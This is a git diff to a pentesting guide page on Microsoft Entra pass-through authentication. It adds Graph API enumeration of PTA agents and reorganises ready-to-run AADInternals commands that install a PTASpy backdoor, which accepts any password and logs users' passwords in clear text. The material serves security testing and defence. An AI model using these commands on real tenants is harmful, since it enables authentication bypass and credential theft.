improvements

Author: carlospolop

src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md

@@ -4,9 +4,9 @@
 
 ## Basic Information
 
-[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**.
+[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Microsoft Entra pass-through authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Microsoft Entra ID, this feature validates users' passwords directly against your on-premises Active Directory.
 
-In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS.
+In PTA **identities** are **synchronized** but **passwords aren't** like in PHS.
 
 The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC).
 
@@ -23,23 +23,60 @@ The authentication is validated in the on-prem AD and the communication with clo
 > If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\
 > He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key).
 
-### On-Prem -> cloud
+### Enumeration
 
-If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication):
+From Entra ID:
 
 ```bash
-Install-AADIntPTASpy
+az rest --url 'https://graph.microsoft.com/beta/onPremisesPublishingProfiles/authentication/agentGroups?$expand=agents'
+# Example response:
+{
+  "@odata.context": "https://graph.microsoft.com/beta/$metadata#onPremisesPublishingProfiles('authentication')/agentGroups(agents())",
+  "value": [
+    {
+      "agents": [
+        {
+          "externalIp": "20.121.45.57",
+          "id": "4a000eb4-9a02-49e4-b67f-f9b101f8f14c",
+          "machineName": "ConnectSync.hacktricks-con.azure",
+          "status": "active",
+          "supportedPublishingTypes": [
+            "authentication"
+          ]
+        }
+      ],
+      "displayName": "Default group for Pass-through Authentication",
+      "id": "d372d40f-3f81-4824-8b9e-6028182db58e",
+      "isDefault": true,
+      "publishingType": "authentication"
+    }
+  ]
+}
 ```
 
-> [!NOTE]
-> If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe).
+Check if the agent is running in the on-prem server:
+
+```bash
+Get-Service -Name "AzureADConnectAuthenticationAgent"
+```
+
+## Pivoting
 
-It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed:
+If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication):
 
 ```bash
-Get-AADIntPTASpyLog -DecodePasswords
+Install-Module AADInternals -RequiredVersion 0.9.3
+Import-Module AADInternals
+Install-AADIntPTASpy # Install the backdoor, it'll save all the passwords in a file
+Get-AADIntPTASpyLog -DecodePasswords # Read the file or use this to read the passwords in clear-text
+
+Remove-AADIntPTASpy # Remove the backdoor
 ```
 
+> [!NOTE]
+> If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe).
+
+
 This backdoor will:
 
 - Create a hidden folder `C:\PTASpy`
@@ -49,10 +86,8 @@ This backdoor will:
 > [!NOTE]
 > When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed.
 
-### Cloud -> On-Prem
-
 > [!CAUTION]
-> After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.**
+> After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** and can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.**
 
 ### Seamless SSO